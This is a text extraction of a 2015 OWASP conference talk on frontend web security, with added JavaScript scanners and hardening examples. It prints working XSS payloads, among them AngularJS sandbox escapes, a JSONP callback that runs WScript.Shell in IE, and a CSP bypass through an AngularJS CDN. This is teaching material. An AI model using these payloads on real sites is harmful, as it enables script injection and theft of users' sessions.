OWASP EEE (Krakow) - It's only about frontend
![Page 1: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/1.jpg)
It’s only about frontend
Sergey Belov
Digital Security
OWASP EEE. 6th of October 2015. Poland
![Page 2: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/2.jpg)
$ whoami
• @ Digital Security
– Pentester
– ZeroNights team
• Bug hunting (Yandex, Google, CloudFlare ...)
• Speaker – OWASP RU, BlackHat 2014, HiP 2014, ZeroNights
• Like all web-related security :]
![Page 3: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/3.jpg)
What we're talking about
Frontend security
≠ client-side attacks
Example: CSRF is a client-side attack, but it depends on the server side
![Page 4: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/4.jpg)
What we're talking about
Some techniques are well known
but some are not
![Page 5: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/5.jpg)
What we're talking about
SOP (Same Origin Policy)
scheme://domain:port + hardening
![Page 6: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/6.jpg)
Cross Site Scripting
DOM
![Page 7: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/7.jpg)
DOM XSS
document.write("Site is at: " + document.location.href);
http://victim.com/action#<script>alert('xss')</script>
![Page 8: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/8.jpg)
DOM XSS
Sources:
• document.URL
• location
• document.referrer
• window.name
• localStorage
• cookies
• …
![Page 9: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/9.jpg)
DOM XSS
Sinks:
• eval
• document.write
• (element).innerHTML
• (element).src
• setTimeout / setInterval
• execScript
• …
https://code.google.com/p/domxsswiki/
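The source-to-sink flow from the slides, as an added example that is not part of the talk. It runs in Node without a browser: a naive single-line scanner flags the slide's snippet (source `document.location.href` meeting sink `document.write`), a helper shows that the fragment carrying the payload never reaches the server, and the vulnerable render is shown next to an HTML-encoding fix. The source and sink lists are the slide's plus a few common additions; the sample inputs are constructed.

```javascript
// Added example (not from the talk): DOM XSS source/sink walk-through.

// Sources and sinks as listed on the slides, plus a few common ones.
const DOM_SOURCES = [
  'document.URL', 'document.location', 'location.href', 'location.hash',
  'location.search', 'document.referrer', 'window.name', 'localStorage',
  'document.cookie',
];
const DOM_SINKS = [
  'eval(', 'document.write(', 'document.writeln(', '.innerHTML', '.outerHTML',
  '.src', 'setTimeout(', 'setInterval(', 'execScript(', 'insertAdjacentHTML(',
];

// Naive triage: flag lines where a source and a sink co-occur. Good enough to
// grep a bundle; real analysis needs data-flow tracking across statements.
function findSourceToSink(jsSource) {
  const findings = [];
  jsSource.split('\n').forEach((line, idx) => {
    const sources = DOM_SOURCES.filter((s) => line.includes(s));
    const sinks = DOM_SINKS.filter((s) => line.includes(s));
    if (sources.length && sinks.length) {
      findings.push({ line: idx + 1, sources, sinks });
    }
  });
  return findings;
}

// The fragment never leaves the browser: server logs and WAFs do not see it,
// which is why fragment-based DOM XSS is invisible to server-side filtering.
function serverVisiblePart(url) {
  return url.split('#')[0];
}

// HTML-context encoding for untrusted data.
function escapeHtml(s) {
  return s.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  }[c]));
}

// Before: the slide's pattern; the raw URL becomes markup in the page.
function renderUnsafe(href) {
  return 'Site is at: ' + href;
}

// After: encode for the HTML context (in a browser, prefer assigning
// element.textContent, which never parses markup at all).
function renderSafe(href) {
  return 'Site is at: ' + escapeHtml(href);
}

// Constructed inputs mirroring the slide.
const SNIPPET = 'document.write("Site is at: " + document.location.href);';
const ATTACK_URL = "http://victim.com/action#<script>alert('xss')</script>";

if (typeof require !== 'undefined' && require.main === module) {
  console.log(findSourceToSink(SNIPPET));
  console.log('server sees:', serverVisiblePart(ATTACK_URL));
  console.log('unsafe:', renderUnsafe(ATTACK_URL));
  console.log('safe:  ', renderSafe(ATTACK_URL));
}
```

Run it with `node dom-xss.js`; the scanner is a triage aid only, and the safe variant assumes an HTML body context (attribute, URL and JavaScript contexts each need their own encoding).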
![Page 10: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/10.jpg)
DOM XSS
![Page 11: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/11.jpg)
Information leaks
![Page 12: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/12.jpg)
Information leaks
JavaScript examples
testServer = host.match(/[^.]+\.((?:f|my\.XXX)\d*)\.YYY\.com/)
devServer = host.match(/^.+\.dev\.YYY\.com$/),
isXXX = testServer && testServer[1].indexOf('my.XXX') == 0,
...
internalDevHOST = '172.16.22.2';
internalProdHOST = '172.16.22.5';
...
var admin_url = '/secretArea/'
![Page 13: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/13.jpg)
Information leaks
CSS examples
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/browser-not-supported\.scss
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/modules\/add-category\.scss
file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\
/assets\/stylesheets\/application\/modules\/alias-preview\.scss
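A scanner for the leak classes on the two slides above (internal IPs, dev/staging hostnames, file:// build paths left in CSS or source maps, and quoted admin paths), added here as an example and not part of the talk. The patterns, keyword lists and the two sample inputs are constructed for this example and should be tuned to the target; the CSS sample reproduces the backslash-escaped form seen on the slide, which the scanner unescapes.

```javascript
// Added example (not from the talk): scan front-end assets for information leaks.

const LEAK_PATTERNS = [
  // RFC 1918 ranges: internal hosts hard-coded in front-end config.
  { kind: 'private-ipv4',
    re: /\b(?:10\.\d{1,3}\.\d{1,3}\.\d{1,3}|172\.(?:1[6-9]|2\d|3[01])\.\d{1,3}\.\d{1,3}|192\.168\.\d{1,3}\.\d{1,3})\b/g },
  // Dev/test/staging hostnames that map the non-production estate (keywords assumed).
  { kind: 'internal-host',
    re: /\b[a-z0-9-]+(?:\.[a-z0-9-]+)*\.(?:dev|test|staging|internal)\.[a-z0-9-]+(?:\.[a-z0-9-]+)*\b/gi },
  // file:/// build paths, also in their CSS-escaped form (file\:\/\/\/...).
  { kind: 'file-path',
    re: /file\\?:\\?\/\\?\/\\?\/[^\s'")*]+/g },
  // Quoted paths that look like hidden admin or debug areas (prefixes assumed).
  { kind: 'admin-url',
    re: /['"](\/(?:admin|secret|internal|debug)[A-Za-z0-9_\/-]*)['"]/gi },
];

// CSS escapes a path as file\:\/\/\/...; strip the backslashes for reporting.
function unescapeCss(s) {
  return s.replace(/\\(.)/g, '$1');
}

function scanForLeaks(text, source = 'unknown') {
  const findings = [];
  for (const { kind, re } of LEAK_PATTERNS) {
    re.lastIndex = 0;           // the regexes are global and shared; reset per scan
    let m;
    while ((m = re.exec(text)) !== null) {
      let value = m[1] || m[0];
      if (kind === 'file-path') value = unescapeCss(value);
      findings.push({ source, kind, value });
    }
  }
  return findings;
}

// Constructed sample bundle, modelled on the slide's JavaScript example.
const SAMPLE_JS = [
  "devServer = host.match(/^.+\\.dev\\.YYY\\.com$/),",
  "var apiBase = 'https://api.dev.example.com/v1';",
  "internalDevHOST = '172.16.22.2';",
  "internalProdHOST = '172.16.22.5';",
  "var admin_url = '/secretArea/';",
].join('\n');

// Constructed sample stylesheet with a CSS-escaped build path, as on the slide.
const SAMPLE_CSS = String.raw`/*# sourceMappingURL=app.css.map */
.x{content:"file\:\/\/\/applications\/hackerone\/releases\/20140221175929\/app\/assets\/stylesheets\/application\/modules\/add-category\.scss"}`;

if (typeof require !== 'undefined' && require.main === module) {
  console.table([...scanForLeaks(SAMPLE_JS, 'app.js'), ...scanForLeaks(SAMPLE_CSS, 'app.css')]);
}
```

Point it at the files you fetched from the asset host (including `.map` files, which often embed full source); every hit is a lead to verify manually, not a vulnerability in itself.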
![Page 14: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/14.jpg)
MVC Frameworks
![Page 15: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/15.jpg)
MVC Frameworks
![Page 16: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/16.jpg)
MVC Frameworks
- Templates
- New elements <rockyou></rockyou>
- Bindings
![Page 17: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/17.jpg)
MVC Frameworks
Logic-less templates
<ul>
<li ng-repeat="phone in phones">
<span>{{phone.name}}</span>
<p>{{phone.snippet}}</p>
</li>
</ul>
![Page 18: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/18.jpg)
MVC Frameworks
Curly braces
<ul>
<li ng-repeat="phone in phones">
<span>{{phone.name}}</span>
<p>{{phone.snippet}}</p>
</li>
</ul>
![Page 20: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/20.jpg)
MVC Frameworks
Mustache Security
• VueJS
• AngularJS
• CanJS
• Underscore.js
• KnockoutJS
• Ember.js
• Polymer
• Ractive.js
• jQuery
• JsRender
• Kendo UI
https://code.google.com/p/mustache-security/
![Page 21: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/21.jpg)
MVC Frameworks
AngularJS (1.1.5) – access to window
<div class="ng-app">
{{constructor.constructor('alert(1)')()}}
</div>
![Page 22: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/22.jpg)
MVC Frameworks
AngularJS (1.2.18) – access to window after the fix
{{
(_=''.sub).call.call({}[$='constructor']
.getOwnPropertyDescriptor(_.__proto__,$)
.value,0,'alert(1)')()
}}
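The plain-JavaScript mechanics behind the two payloads above, as an added example that is not from the talk and is not AngularJS code. The "filter" here is a made-up stand-in (an assumption for this example) for an expression check that rejects the literal member name `constructor`: the first payload names it directly and is caught, while the second smuggles the name in as a string key and reads `Function` out of a property descriptor instead of via `.constructor`, which is what the real 1.2.18 payload does. Running it in Node shows that both routes end at `Function`.

```javascript
// Added example (not from the talk): why the 1.2.18 payload survives a
// member-name blacklist. Plain Node, no AngularJS involved.

// Stand-in filter (assumed for this example): reject expressions that use
// `constructor` as a member name, the way a naive sandbox might.
function naiveMemberNameFilter(expr) {
  return !/(^|[.\s])constructor\b/.test(expr);
}

// 1.1.5-style primitive: from any object, .constructor.constructor is Function.
function reachFunctionViaMemberName(anyObject) {
  return anyObject.constructor.constructor;
}

// 1.2.18-style primitive: the member name is a string in a variable, `{}[$]`
// is Object, and Function is read from Function.prototype's own
// `constructor` descriptor. Function.prototype.call is then used to invoke
// Function itself without ever writing `.constructor` in the expression.
function reachFunctionViaDescriptor() {
  const _ = ''.sub;                          // any built-in function
  const $ = 'constructor';                   // computed key, never a literal member
  const desc = {}[$].getOwnPropertyDescriptor(_.__proto__, $);
  return _.call.call(desc.value, 0, 'return 6 * 7');  // === Function('return 6 * 7')
}

// The two payloads as they appear on the slides.
const PAYLOAD_1_1_5 = "constructor.constructor('alert(1)')()";
const PAYLOAD_1_2_18 =
  "(_=''.sub).call.call({}[$='constructor'].getOwnPropertyDescriptor(_.__proto__,$).value,0,'alert(1)')()";

if (typeof require !== 'undefined' && require.main === module) {
  console.log('1.1.5 payload passes filter:', naiveMemberNameFilter(PAYLOAD_1_1_5));
  console.log('1.2.18 payload passes filter:', naiveMemberNameFilter(PAYLOAD_1_2_18));
  console.log('descriptor route yields Function:', reachFunctionViaDescriptor()() === 42);
}
```

The lesson is the one on the next slide: blacklisting property names in an expression language is a losing game, and the fix is to run the version that closed the hole (or, in later AngularJS, to stop relying on the expression sandbox at all).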
![Page 23: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/23.jpg)
MVC Frameworks
Keeping frameworks up to date is important for security!
![Page 24: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/24.jpg)
Flash
![Page 25: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/25.jpg)
Flash
A typical example
<cross-domain-policy>
<allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>
![Page 26: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/26.jpg)
Flash
A non-typical example
<cross-domain-policy>
... multiple domains (some unregistered)...
</cross-domain-policy>
Real bugbounty report - $$$
![Page 27: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/27.jpg)
Flash
A non-typical example
<cross-domain-policy>
...domains from social networks (apps)...
</cross-domain-policy>
Real bugbounty report - $$$
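A crossdomain.xml audit in the spirit of the three slides above, added here as an example and not part of the talk. Node has no built-in XML parser, so attribute extraction is regex-based and assumes the flat policy format shown; the two sample policies are constructed. A `domain="*"` entry is the typical finding, while the non-typical ones are the domain lists that need checking by hand: the audit returns every trusted domain so you can verify that each is still registered and that none of them hosts third-party content (the unregistered-domain and social-network-apps cases from the bug bounty reports).

```javascript
// Added example (not from the talk): audit a Flash crossdomain.xml.

// Extract each <allow-access-from .../> element's attributes.
function parseAllowAccessFrom(xml) {
  const entries = [];
  const tagRe = /<allow-access-from\b([^>]*)\/?>/gi;
  let m;
  while ((m = tagRe.exec(xml)) !== null) {
    const attrs = {};
    const attrRe = /([\w-]+)\s*=\s*"([^"]*)"/g;
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1]] = a[2];
    entries.push(attrs);
  }
  return entries;
}

function auditCrossDomainPolicy(xml) {
  const findings = [];
  const domainsToVerify = [];
  for (const e of parseAllowAccessFrom(xml)) {
    const d = e.domain || '';
    if (d === '*') {
      findings.push({ severity: 'high',
        msg: 'domain="*": a SWF on any site can read responses with the victim\'s cookies' });
    } else if (d.startsWith('*.')) {
      findings.push({ severity: 'medium', msg: `wildcard subdomain trust: ${d}` });
      domainsToVerify.push(d.slice(2));
    } else if (d) {
      domainsToVerify.push(d);
    }
    // Default is secure="true" for a policy served over HTTPS; "false" lets a
    // plain-HTTP SWF (network attacker) read HTTPS content.
    if (e.secure === 'false') {
      findings.push({ severity: 'medium',
        msg: `secure="false" for ${d || '*'}: an http:// SWF may read https:// responses` });
    }
  }
  return { findings, domainsToVerify: [...new Set(domainsToVerify)] };
}

// Constructed samples: the typical policy from the slide and a non-typical one.
const TYPICAL = `<cross-domain-policy>
  <allow-access-from domain="*" to-ports="80"/>
</cross-domain-policy>`;

const NON_TYPICAL = `<cross-domain-policy>
  <allow-access-from domain="*.example.com"/>
  <allow-access-from domain="old-partner-site.example"/>
  <allow-access-from domain="apps.social-network.example" secure="false"/>
</cross-domain-policy>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(auditCrossDomainPolicy(TYPICAL));
  console.log(auditCrossDomainPolicy(NON_TYPICAL));
}
```

For every entry in `domainsToVerify`, check WHOIS/DNS for expiry and ask who can upload content there; a domain that anyone can register, or one that serves user-uploaded files, extends the policy's trust to that anyone.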
![Page 28: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/28.jpg)
Flash
XSS via Flash
getURL(_root.URI,'_targetFrame');
and many other cases
https://www.owasp.org/index.php/Testing_for_Cross_site_flashing_(OTG-CLIENT-008)
![Page 29: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/29.jpg)
Flash
CVE-2011-2461 IS BACK!
1) Vulnerable version of Adobe Flex
2) Full SOP bypass
https://github.com/ikkisoft/ParrotNG/
http://blog.nibblesec.org/2015/03/the-old-is-new-again-cve-2011-2461-is.html
![Page 30: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/30.jpg)
JSONP
![Page 31: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/31.jpg)
JSONP
Typical case
<script src="http://vuln/getInfo?c=parseResponse"></script>
![Page 32: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/32.jpg)
JSONP
No sensitive data? But the Content-Type is:
• text/javascript
• application/javascript
• application/x-javascript
Try ?cb=new%20ActiveXObject("WScript.Shell").Exec("calc")//
and get client-side RCE (IE only; SE, i.e. social engineering, is required)
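A JSONP responder in both forms, added here as an example and not part of the talk: the vulnerable pattern reflects the callback parameter verbatim into a body served as JavaScript, so even an endpoint with no sensitive data is a reflected script injection (the slide's `?cb=` payload is simply echoed back); the hardened form restricts the callback to an identifier, sets `nosniff`, and prefixes the body so attacker-chosen bytes never start the response. The response shape is an assumption for this example rather than any framework's API; the attack callback is the one from the slide.

```javascript
// Added example (not from the talk): JSONP callback handling, before and after.

// Before: the callback is whatever arrived in the query string.
function jsonpVulnerable(callback, data) {
  return {
    status: 200,
    headers: { 'Content-Type': 'application/javascript' },
    body: `${callback}(${JSON.stringify(data)});`,
  };
}

// Only a plain identifier or dotted path such as `app.handlers.done`.
const SAFE_CALLBACK = /^[A-Za-z_$][\w$]*(\.[A-Za-z_$][\w$]*)*$/;

// After: validate the callback shape, refuse sniffing, and make sure the
// attacker never controls the first bytes of the response (the "/**/"
// prefix is what defeats the Rosetta Flash style of abuse, where a response
// starting with attacker-chosen bytes is loaded as a SWF).
function jsonpHardened(callback, data) {
  if (typeof callback !== 'string' || callback.length > 64 || !SAFE_CALLBACK.test(callback)) {
    return { status: 400, headers: { 'Content-Type': 'text/plain' }, body: 'invalid callback' };
  }
  return {
    status: 200,
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      'X-Content-Type-Options': 'nosniff',
    },
    body: `/**/${callback}(${JSON.stringify(data)});`,
  };
}

// The slide's payload, URL-decoded.
const ATTACK_CALLBACK = 'new ActiveXObject("WScript.Shell").Exec("calc")//';

if (typeof require !== 'undefined' && require.main === module) {
  console.log(jsonpVulnerable(ATTACK_CALLBACK, { ok: true }).body);
  console.log(jsonpHardened(ATTACK_CALLBACK, { ok: true }));
  console.log(jsonpHardened('app.done', { ok: true }).body);
}
```

Validating the callback closes the injection; it does not make JSONP safe for per-user data, because any site can still include the script tag with the victim's cookies. For that, move to CORS with an explicit origin allow-list, or require a token that the browser will not send cross-site.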
![Page 33: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/33.jpg)
JSONP
http://www.youtube.com/watch?v=T0vwLsHUing
![Page 34: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/34.jpg)
HTML5 security
![Page 35: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/35.jpg)
HTML5 Security
Window.postMessage()
otherWindow.postMessage(message, targetOrigin);
window.addEventListener("message", receiveMessage, false);
function receiveMessage(event)
{
if (event.origin !== "http://example.org:8080")
return;
// ...
}
(diagram: Domain A ↔ Domain B)
![Page 36: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/36.jpg)
HTML5 Security
Window.postMessage()
if(message.origin.indexOf(".example.com")!=-1)
{
/* ... */
}
Wrong!
example.com.attacker.com (any attacker-controlled origin containing the substring, e.g. https://www.example.com.attacker.com, passes the check)
![Page 37: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/37.jpg)
HTML5 Security
otherWindow.postMessage(message, targetOrigin);
Window.postMessage()
Iframe: https://accounts.google.com/b/0/ListAccounts?listPages=0&mo=1&origin=https%3A%2F%2F123123.google.com
window.parent.postMessage("... sensitive data / user login etc ...", "https:\x2F\x2F123123.google.com");
The origin query parameter becomes the targetOrigin of the postMessage call, so the data goes to whatever origin that parameter names.
![Page 38: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/38.jpg)
HTML5 security
HTTP access control (CORS)
1) Modern
2) Secure by default
3) Very hard to make a mistake
![Page 39: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/39.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
![Page 40: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/40.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
Access-Control-Allow-Credentials: true
![Page 41: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/41.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: *
is not compatible with
Access-Control-Allow-Credentials: true
![Page 42: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/42.jpg)
HTML5 security
HTTP access control (CORS)
Access-Control-Allow-Origin: $origin;
(the request's Origin header reflected back; combined with Access-Control-Allow-Credentials: true this lets any site read the authenticated response)
![Page 43: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/43.jpg)
HTML5 security
WebSockets
1) No authorization and/or authentication
2) WSS:// - for sensitive data
3) Validation
4) Check origin
5) …
![Page 44: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/44.jpg)
HTML5 security
Example with websockets (Agar.IO – HTML5 game)
1) Visit Agar.IO
2) Get a new server (/findServer response, some random IP)
3) Connect (ws://) to that random IP
The random IP handles only requests with a valid origin (like agar.io). This can
prevent custom clients (except cases with a full proxy on the server side)
https://www.owasp.org/index.php/HTML5_Security_Cheat_Sheet
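One strict origin check reused across the three places the HTML5 slides cover (the receiving side of postMessage, CORS response headers, and the WebSocket handshake), added here as an example and not part of the talk. The substring check from the postMessage slide and the `$origin` reflection from the CORS slide are kept as the wrong variants so the difference is visible; the allow-list and probe origins are constructed for this example.

```javascript
// Added example (not from the talk): origin validation for postMessage, CORS
// and WebSocket, with the slides' mistakes kept for comparison.

const ALLOWED_ORIGINS = new Set(['https://app.example.com', 'https://www.example.com']);
const TRUSTED_SUFFIX = '.example.com';   // trusts every subdomain; drop it if any is untrusted

// Wrong (slide): any origin that merely contains the substring passes.
function originCheckSubstring(origin) {
  return origin.indexOf(TRUSTED_SUFFIX) !== -1;
}

// Right: parse, require a bare https origin, then an exact allow-list match
// or a dot-boundary suffix match on the hostname. "null" (sandboxed iframes,
// file://) and other non-URLs fail to parse and are rejected.
function originCheckStrict(origin) {
  let u;
  try { u = new URL(origin); } catch { return false; }
  if (u.protocol !== 'https:' || u.origin !== origin) return false;
  if (ALLOWED_ORIGINS.has(origin)) return true;
  return u.hostname.endsWith(TRUSTED_SUFFIX);
}

// postMessage receiver (browser side); event is { origin, data }.
function receiveMessage(event) {
  if (!originCheckStrict(event.origin)) return null;   // drop silently
  return event.data;
}

// CORS, wrong: reflecting Origin with credentials is the "$origin" slide.
function corsHeadersReflect(requestOrigin) {
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
  };
}

// CORS, right: only allow-listed origins get CORS headers at all, and the
// response is marked as varying by Origin so shared caches keep them apart.
function corsHeadersStrict(requestOrigin) {
  if (!originCheckStrict(requestOrigin)) return {};
  return {
    'Access-Control-Allow-Origin': requestOrigin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// WebSocket handshake: browsers always send Origin; reject before upgrading.
// This stops other sites' pages, not non-browser clients, which can send any
// Origin they like (the Agar.IO slide's custom-client caveat).
function acceptWebSocketUpgrade(handshakeHeaders) {
  const origin = handshakeHeaders['origin'];
  return typeof origin === 'string' && originCheckStrict(origin);
}

// Constructed probe origins.
const PROBE_ORIGINS = [
  'https://app.example.com',
  'https://www.example.com.attacker.com',
  'http://app.example.com',
  'null',
];

if (typeof require !== 'undefined' && require.main === module) {
  for (const o of PROBE_ORIGINS) {
    console.log(o, '| substring:', originCheckSubstring(o), '| strict:', originCheckStrict(o));
  }
}
```

On the sending side of postMessage the same rule applies in reverse: pass the exact expected origin as `targetOrigin`, never `"*"` and never a value copied from a query parameter.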
![Page 45: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/45.jpg)
Content Security Policy
![Page 46: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/46.jpg)
Content Security Policy
X-Content-Security-Policy:
script-src js.example.com
(X-Content-Security-Policy is the legacy prefixed header; current browsers use Content-Security-Policy)
![Page 47: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/47.jpg)
Content Security Policy
![Page 48: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/48.jpg)
Content Security Policy
Latest Firefox: "security csp" command in the Developer Toolbar
![Page 49: OWASP EEE (Krakow) - It's only about frontend](https://reader034.vdocuments.net/reader034/viewer/2022050613/58f1745d1a28abf16e8b4603/html5/thumbnails/49.jpg)
Content Security Policy
@cure53 challenge – CSP bypass
• CDN with AngularJS is allowed: ajax.googleapis.com
ng-app"ng-csp ng-click=$event.view.alert(1337)>
<script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
https://github.com/cure53/XSSChallengeWiki/wiki/H5SC-Minichallenge-3:-%22Sh*t,-it's-CSP!%22
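A small policy checker for the weakness behind the challenge above, added here as an example and not part of the talk: a `script-src` that trusts a whole CDN host also trusts every library on it, and with AngularJS loadable from that host an HTML injection with `ng-app`/`ng-csp` turns into script execution without any inline script. The risky-host list, the verdict texts, the reconstruction of the challenge policy and the hardened policy are all assumptions for this example.

```javascript
// Added example (not from the talk): audit a CSP's script-src for gadget-hosting CDNs
// and other settings that leave XSS exploitable.

// Hosts that serve many libraries, including script gadgets such as AngularJS (assumed list).
const RISKY_SCRIPT_HOSTS = [
  'ajax.googleapis.com', 'cdnjs.cloudflare.com', 'cdn.jsdelivr.net', 'unpkg.com',
];

// Split "a b; c d" into { a: ['b'], c: ['d'] }.
function parseCsp(policy) {
  const directives = {};
  for (const part of policy.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length) directives[tokens[0].toLowerCase()] = tokens.slice(1);
  }
  return directives;
}

function auditScriptSrc(policy) {
  const d = parseCsp(policy);
  const src = d['script-src'] || d['default-src'] || [];
  const findings = [];
  const hasNonceOrHash = src.some((s) => s.startsWith("'nonce-") || s.startsWith("'sha"));
  if (src.length === 0) {
    findings.push('no script-src or default-src: inline and remote scripts are allowed');
  }
  if (src.includes("'unsafe-inline'") && !hasNonceOrHash) {
    findings.push("'unsafe-inline' without a nonce or hash: the policy does not stop XSS");
  }
  if (src.includes("'unsafe-eval'")) {
    findings.push("'unsafe-eval' permits eval/Function (client-side template engines need it)");
  }
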